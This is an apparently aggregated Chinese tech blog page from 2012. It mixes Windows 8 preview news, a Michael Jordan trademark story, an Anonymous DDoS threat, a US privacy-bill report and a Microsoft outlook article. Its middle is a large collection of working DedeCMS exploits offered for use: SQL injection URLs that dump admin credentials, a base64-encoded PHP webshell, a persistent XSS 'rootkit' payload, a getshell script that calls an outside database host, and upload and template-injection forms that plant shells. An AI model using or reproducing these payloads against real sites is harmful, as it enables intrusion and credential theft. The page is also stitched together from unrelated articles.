2012年2月

作者:april one

欲知Win8变化有多少,且看此文八点小总结,快了快了,微软将在巴塞罗那时间今天下午15:00-17:00#北京时间22:00-24:00#的世界移动大会MWC2012上进行主题演讲。

Windows8客户预览版即将到来,IT之家已经独家公布Win8CP消费者预览版系统下载时间:北京时间 - 晚上 22:35,那么在Windows8客户预览版开启公测之时,将有哪些不一样呢?且看如下Win8的八大变化。

一、漂亮的待机界面:锁屏状态下,用户可以自定义让后台推送邮件提醒等通知。

静候Win8客户预览版公测窥探Win8八点变化
漂亮的待机界面

二、可以使用Windows Live ID登录系统:一个帐号走天下,个性化设置随身带。

静候Win8客户预览版公测窥探Win8八点变化
使用Windows Live ID登录系统

三、“开始”按钮消失:当鼠标滑倒桌面左下角,显示的是Metro开始屏幕预览图

静候Win8客户预览版公测窥探Win8八点变化
“开始”按钮消失

四、个性化的动态 Metro 界面:动态磁贴的内容将实现实时更新

静候Win8客户预览版公测窥探Win8八点变化
个性化的动态 Metro 界面

五、方便的手势操作:即使非触摸屏幕,要相信鼠标也可是实现诸多功能。

静候Win8客户预览版公测窥探Win8八点变化
方便的手势操作

六、改善的基础操作:复制、移动、重命名和删除;

静候Win8客户预览版公测窥探Win8八点变化
改善的基础操作

七、可以使用图片密码登录:图片密码将极大确保系统的安全性。

静候Win8客户预览版公测窥探Win8八点变化
可以使用图片密码登录

八、直接访问 ISO 和 VHD 文件中的数据。Windows 8使用户可以轻松访问两种重要存储格式 - ISO 和 VHD 文件 - 的内容

静候Win8客户预览版公测窥探Win8八点变化
直接访问 ISO 和 VHD 文件中的数据

在Windows8正式开启公测之前,回顾上述八点变化,当然绝不仅仅只有这些,Windows8是微软带来的翻天覆地性的革命产品,就在今晚了,一起看吧。

    东方网2月23日消息:据美联社报道,前NBA球星迈克尔-乔丹(Michael Jordan)将起诉中国乔丹体育有限公司。迈克尔-乔丹的女发言人发表了一份声明,声明中写道,“很遗憾看到一家公司在没有得到自己允许的前提下,利用自己的中国名字来做生意,同时还用了23这个号码,并试图引用我孩子的名字。”

    乔丹表示,这个诉讼并不关乎金钱,这是关于原则的问题,同时也是为了保护自己的名字。

    乔丹体育股份有限公司(简称乔丹体育),其商标主形象是美国篮球明星乔丹跃起扣篮,在中国以廉价运动鞋占据了相当大的农村市场,据媒体报道,其2010年销售收入达29.1亿元,并于2011年底过会,谋求上市。

著名黑客组织Anonymous一直对美国新的反盗版发案"SOPA"持强烈反对态度,不过这次他们玩得过火了。
该组织最近威胁要干掉整个互联网以给“SOPA法案,华尔街及黑心银行家,前者的保护伞政府”等一点颜色看看,如果代号名为"Operation Global Blackout"的行动成功,那么全世界将在3月31日陷入无法使用互联网的状态。
至于具体手段,Anonymous计划对所有13台DNS域名根服务器发起大规模DDoS行动,届时在浏览器中输入所有域名都将返回错误页面,使得不少用户届时将认为网络无法使用。Anonymous称他们的行动只是给美国政府一个警告而不是计划彻底“杀死”互联网,但他们没有说明行动具体的持续时间,可能是几个小时也可能会是几天。

dedecms 5.6 rss注入漏洞

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 嵌入恶意代码执行漏洞

注册会员,上传软件:
本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行 a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57} 
生成x.php 密码xiao,直接生成一句话。 

dede 5.6 GBK SQL注入漏洞

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''; 

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe''")/> 

http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''"><******%20src=http://www.test.com/ 

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 

DEDECMS 全版本 gotopage变量XSS漏洞

1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS(织梦)变量覆盖getshell

#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]
);
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' [url]www.site.com[/url] 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "[*] Exploit Success \n";
if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;

if($aid==2)echo "[*] Shell:".$url."/$path/fuck.php\n" ;

if($aid==3)echo "[*] Shell:".$url."/$path/plus/fuck.php\n";

}else{
echo "[*] Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*]  No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}

?>;

织梦(DedeCms) v5.6-5.7 越权访问漏洞(直接进入后台)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面validate=dcug改为当前的验证码,即可直接进入网站后台

此漏洞的前提是必须得到后台路径才能实现

dedecms织梦 标签远程文件写入漏洞

前题条件,必须准备好自己的dede数据库,然后插入数据: 

insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

再用下面表单提交,shell 就在同目录下 1.php。
原理自己研究。。。 

<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCms v5.6 嵌入恶意代码执行漏洞

注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得

Dedecms <= V5.6 Final模板执行漏洞

1 上传一个模板文件:
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
uploads/userup/2/12OMX04-15A.jpg

模板内容是(如果限制图片格式,加gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2 修改刚刚发表的文章,查看源文件,构造一个表单:

<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input  name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags"  value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select>            <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" onchange="SeePicNew('divpicview',this);"  maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../ uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(这里构造)
</div>

<!-- 表单操作区域 -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" onclick="this.src=this.src+'?'" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset" onclick="location.reload();">重置</button>
</div>

</div>

</form>


提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
假设刚刚修改的文章的aid为2,则我们只需要访问:
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell:1.php

DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为1.gif

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">  
<input type="hidden" name="aid" value="7" />  
<input type="hidden" name="mediatype" value="1" />  
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>  
<input type="hidden" name="dopost" value="save" />  
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>  
<input name="addonfile" type="file" id="addonfile"/>  
<button class="button2" type="submit" >更改</button>  
</form>  

构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
发表文章,然后构造修改表单如下:



<form  action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">  
<input type="hidden" name="dopost" value="save" />  
<input type="hidden" name="aid" value="2" />  
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />  
<input type="hidden" name="channelid" value="1" />  
<input type="hidden" name="oldlitpic" value="" />  
<input type="hidden" name="sortrank" value="1282049150" />     
<input  name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>  
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>  
<select name='typeid' size='1'>  
<option value='1' class='option3' selected=''>Test</option>  
<select name='mtypesid' size='1'>  
<option value='0' selected>请选择分类...</option>  
<option value='1' class='option3' selected>aa</option></select>   
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>  
<input type='hidden' name='dede_addonfields' value="templet">  
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">  
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />  
<button class="button2" type="submit">提交</button>  
</form>

织梦(Dedecms)V5.6 远程文件删除漏洞

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞

http://www.test.com/plus/carbuyaction.php?dopost=return&code=../../

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞

plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5

dedecms织梦 v5.6 两处跨站漏洞

/plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.test.net%3E&PageNo=2

http://www.test.com/member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.test.net%3E

织梦(Dedecms) 5.1 feedback_js.php 注入漏洞

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦(Dedecms)select_soft_post.php页面变量未初始漏洞

<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
  <input type='hidden' name='activepath' value='/data/cache/' />
  <input type='hidden' name='cfg_basedir' value='../../' />
  <input type='hidden' name='cfg_imgtype' value='php' />
  <input type='hidden' name='cfg_not_allowall' value='txt' />
  <input type='hidden' name='cfg_softtype' value='php' />
  <input type='hidden' name='cfg_mediatype' value='php' />
  <input type='hidden' name='f' value='form1.enclosure' />
  <input type='hidden' name='job' value='upload' />
  <input type='hidden' name='newname' value='fly.php' />
  Select U Shell <input type='file' name='uploadfile' size='25' />
  <input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦(DEDECMS) 5.1 plus/feedback_js.php存在注入漏洞

为了闭合我用了两次union http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
DedeCMS 5.1 SQL Injection ######################### Securitylab.ir ########################
# Application Info:
# Name: DEDECMS
# Version: 5.1
#################################################################
# Discoverd By: Securitylab.ir 
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection Vulnerability
# Risk: Medium
#===========================================================
# feedback_js.php
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
if(is_array($row)) $urlindex = $row['id'];
}
if(empty($arcID) && empty($urlindex)) exit();
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' "; 
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
...
# http://site.com/[PATH]/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

织梦(dedecms)V5.5分页处理函数信息泄露漏洞

http://www.dedecms.com/plus/list.php?tid=10&pageno=0
http://www.dedecms.com/plus/list.php?tid=10&pageno='
http://www.dedecms.com/plus/list.php?tid=10&pageno=-1

织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞

利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。

1. 访问网址:
http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
可看见错误信息

2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是

<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>

按确定后的看到第2步骤的信息表示文件木马上传成功.

织梦(DedeCms)plus/infosearch.php 文件注入漏洞

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

DEDECMS跨站及爆绝对路径漏洞

提交:http://127.0.0.1/dc/include/jump.php?gurl=http://00day.cn 会跳转到http://00day.cn

新手朋友会认为这就是这个跨站的利用了,其实不然,我们可以尝试去闭合他!但PHP有gpc限制,我们该怎么绕?

提交:http://127.0.0.1/dc/include/jump.php?gurl=%23"</script><script>alert(/00day.cn/)</script>/*

Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x # .: Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x
# .: [Author] Depo2 - TpTLabs.com
# .: [Affected versions] http://www.dedecms.com/ - DedeCms v5.x
# .: [Credit] The disclosure of these issues has been credited to Depo2
# .: [Classification]
# Attack Type: Input Manipulation
# Impact: Loss of Integrity
# Fix: N/A Public release vulnz: {26-08-2008 Sun}
# Class Input Validation Error
# Original Advisory http://depo2.nm.ru/DedeCmsv5.x_XSS.txt
# Other Advisory http://www.xssing.com/index.php?x=3&y=53

- XSS -

[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=typeid&bt=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=[XSS]
[DedeCms WebSite]/dede/content_list.php?arcrank=[XSS]
[DedeCms WebSite]/dede/content_list.php?dopost=listArchives&nowpage=1&totalresult=0&arcrank=[XSS]&cid=[XSS/SQL]&keyword=[XSS]+&orderby=[XSS/SQL]&imageField=%CB%D1%CB%F7
[DedeCms WebSite]/dede/content_list.php?channelid=[XSS]&cid=0&adminid=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=form1.picname&imgstick=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=[XSS]
[DedeCms WebSite]/dede/login.php?gotopage=[XSS]
[DedeCms WebSite]/dede/article_keywords_select.php?f=[XSS]
[DedeCms WebSite]/dede/file_pic_view.php?activepath=[XSS]
[DedeCms WebSite]/member/login.php?gourl=[XSS]
[DedeCms WebSite]/dede/pic_view.php?activepath=[XSS]

- Php Path Discusion -

[DedeCms WebSite]/include/dialog/

- XSRF -

[DedeCms WebSite]/dede/sys_info.php? have XSRF
edit___cfg_beian,edit___cfg_keywords etc.. parameter not checking evil code
if attacker wright a "end of textarea" </textarea> tag thats give XSS alert :)

[XSS Code] :</script>'"><script>alert(document.cookie)</script>

织梦(dedecms)2007 group/search.php注入漏洞

http://127.0.0.1/dg/group/search.php?sad=g&keyword=%cf'

美国政府23日提出网络用户隐私权利法案,为更好地保护互联网用户隐私设立了指导方针,并要求相关利益方商讨制定这一法案的具体执行措施。



根据白宫发布的报告,用户隐私权利法案为如何保护用户隐私设定了7项原则,其中包括网络用户有权控制哪些个人数据可以被收集和使用,有权得到易于理解的有关隐私和安全方面的信息,个人信息被收集、使用、披露的方式必须与用户提供这些信息的背景相一致,企业必须负责任地使用用户信息等。



美国总统奥巴马在当天发表的声明中说,随着互联网技术的发展,网络用户的信任对数字化经济的持续发展至关重要。以这些原则为指导,互联网公司、用户利益维护者和政策制定者将一起努力保护用户隐私,并确保互联网继续成为创新和经济增长的平台。



报告说,美国商务部将召集网络公司、网络用户团体和其他利益相关机构,依据法案商定网络用户隐私权利法案的具体执行措施。企业可以自愿决定是否接受这些规则。一旦企业承诺遵守,其行为将受到美国联邦贸易委员会的监督。



与此同时,包括谷歌(微博)、雅虎、微软(微博)和美国在线在内的众多互联网企业已表示将在浏览器上使用“不跟踪”技术,以方便网络用户决定是否接受上述公司的追踪行为。



美国联邦贸易委员会主席乔恩·莱博维茨说,很高兴这么多公司加入到保护用户隐私的行列,这样用户能有更大的选择权来决定他们的信息是否被跟踪。



美国白宫国家经济委员会主任吉恩·斯珀林认为,互联网公司的承诺,为自发的行业行动如何增强整个互联网的信任树立了榜样。



美国商务部长约翰·布赖森认为,美国需要增强对网络用户隐私的保护,需要设立基本的原则为企业政策提供指引。



随着信息技术的发展和商业模式的转变,如何更好地保护互联网用户隐私成为美国政府关心的问题。2010年,美国商务部就此启动了全面评估,就一系列政策建议征求了公众意见。



       美国IT网站eWeek在2011年底撰文分析决定微软未来十年成败的十款产品,文中Windows 8、Bing、Xbox榜上有名。



以下为文章全文:



       尽管微软目前仍掌控利润丰厚的主营业务,并坐拥巨额现金,但不可否认的是,当前微软的利润来源仍依赖于以Windows、Office、Xbox为代表的传统产品。而以下十款以Windows 8为代表的产品则将决定微软能否维持软件行业的巨头地位,这其中既包括微软自家产品,也包括来自竞争对手的产品。



       微软依旧是科技行业的重要一员。目前,全球绝大多数电脑都采用微软开发的软件产品。更为重要的是,微软Office系列产品已经成为全球企业的行业标准。有人说,科技行业能取得今天的辉煌成就,微软的作用不可或缺,这种说法丝毫不夸张。但微软目前也面临着严峻的挑战。苹果、谷歌以及其它无数竞争对手为了将微软排挤出科技行业可谓不遗余力。为实现这一目标,这些公司不断推出创新产品,收购其它企业,在产品研发方面投入巨资。他们能否削弱微软在科技行业的影响力,是一个仁者见仁智者见智的问题,但毋庸置疑,这是微软诸多竞争对手的最大愿望。



       鉴于此,以下十款产品或许能帮助微软在未来十年延续辉煌,避免市值大幅缩水。如果微软能做出顺应市场的理想投资和决策,那么这家软件巨头会继续取得成功。不过,如果竞争对手得偿所愿,微软或许会面临更大的挑战。



Windows 8



定于2012年内正式上市的Windows 8操作系统或许会是微软未来成功的关键。如果Windows 8未取得成功,那么Windows在桌面系统和移动设备方面的重要性将会下降,硬件厂商会直接投入其他操作平台的怀抱。但是,倘若PC用户能迅速升级到Windows 8,微软将会无限期地保持住当前的市场主导地位。



Bing



       20世纪90年代中期,微软在互联网和云计算领域起步较晚,但如今在这个市场的研发投入越来越大。为了应对谷歌的挑战,微软已经将必应打造成为搜索市场上一款举足轻重的产品,成为谷歌真正的对手。不过,谷歌仍然主导着搜索市场,如果谷歌能继续巩固其现有领先地位,进一步加强在广告领域的实力,那么微软在互联网市场有所作为的梦想或许会破灭。



Xbox



Xbox 360游戏机的人气在过去几年越来越高。Xbox 360的销量暂时轻松超过了索尼PlayStation 3和任天堂Wii。未来10年,这款设备可能会成为微软的“摇钱树”,因为越来越多的家庭会使用视频流业务。目前,微软的目标是通过Xbox 360提供电视直播服务,这一计划已得到Netflix和Hulu Plus的支持。总之,Xbox 360对微软的重要性远远超过许多人的预想。



Mac OS X



       微软未来成败并不完全取决于自有产品的表现。恰恰相反,像Mac OS X这样的竞争产品也会对微软的未来命运产生重要影响。例如,如果因为Mac持续受欢迎,Mac OS X继续抢占Windows市场份额的话,微软及其厂商合作伙伴将会作出何种反应?此外,如果开发者继续凭借Mac OS X的应用商店App Store获得成功,他们无疑会继续专注于苹果操作系统的开发,而不是Windows。因此,Mac OS X已经对微软构成了真正的威胁。



谷歌云应用



谷歌为企业提供了大量云服务,包括Gmail、Google Docs、协作软件及其它产品。迄今为止,谷歌一直未能蚕食微软Office 365云服务产品的市场份额,但随着时间的推移,越来越多的公司会采用云服务,并发现谷歌的服务价格更具吸引力,此时,市场格局可能就会发生转变。业内人士估计,微软与谷歌之间在云服务上的竞争也会随着时间推移日趋加剧。



Windows Phone 7



       Windows Phone 7对微软未来十年走向同样具有举足轻重的影响。微软目前在智能手机市场还缺乏知名度,尽管微软承诺会改变这种局面,但迄今一直未能兑现其承诺。如果Windows Phone 7在明年无法吸引太多用户,那么微软移动业务部门可能会从此彻底“歇菜”。



诺基亚



值得注意的是,如果诺基亚将来不推出搭载Windows Phone 7系统的产品,那么Windows Phone 7可能也无法获得成功。问题是,诺基亚市场份额近来遭到严重蚕食,而且从目前的情况来看,这种局面在短期内难以得到改变。但如果Windows Phone 7能扭转诺基亚的下滑颓势,这会极大地帮助微软提升在移动市场上的地位,如果不能做到这一点,微软移动业务的前景会十分黯淡。



Android



       从移动市场的角度来看,尤其值得注意的是,Android同样对微软的未来命运至关重要。目前,微软和谷歌都遵从同样的战略,即通过创建一个操作系统,让厂商在他们的设备上使用。Android迄今属于赢家,但微软认为自己可以改变这种局面。如果Android今后能延续这样的发展势头,巩固在该领域的领先地位,那么留给微软的只剩下残羹冷炙,这一结果将对微软的财务业绩产生不利影响。



Apple iOS



       如果Android在移动市场对微软形成威胁,那么苹果iOS操作系统同样也会。目前世界上最为流行的智能手机和平板电脑都采用这款操作系统,更为重要的是,许多人都认为苹果电视也将采用iOS系统,这样一来,苹果又在家庭娱乐产品市场与微软成为竞争对手。如果不是因为iOS,微软在移动领域可能不会遇到这么多麻烦。虽然iOS自身也存在问题,但已无法阻止其前进的脚步。



PC



        过去两年,很多PC厂商在使用Windows时总会三思而后行。这种问题缘于Vista,随着一些PC厂商开始将Linux桌面系统作为Windows的替代品,微软开始担心起来。惠普后来表示将考虑在自家PC产品上使用WebOS。随着谷歌推出Chromebook,微软开始面临着更大的威胁。如果Windows 8取得成功,而PC厂商认为其它平台无足轻重,那么微软的日子会好过一些。可一旦Windows 8的市场表现不及预期,微软或许会陷入更大的麻烦。

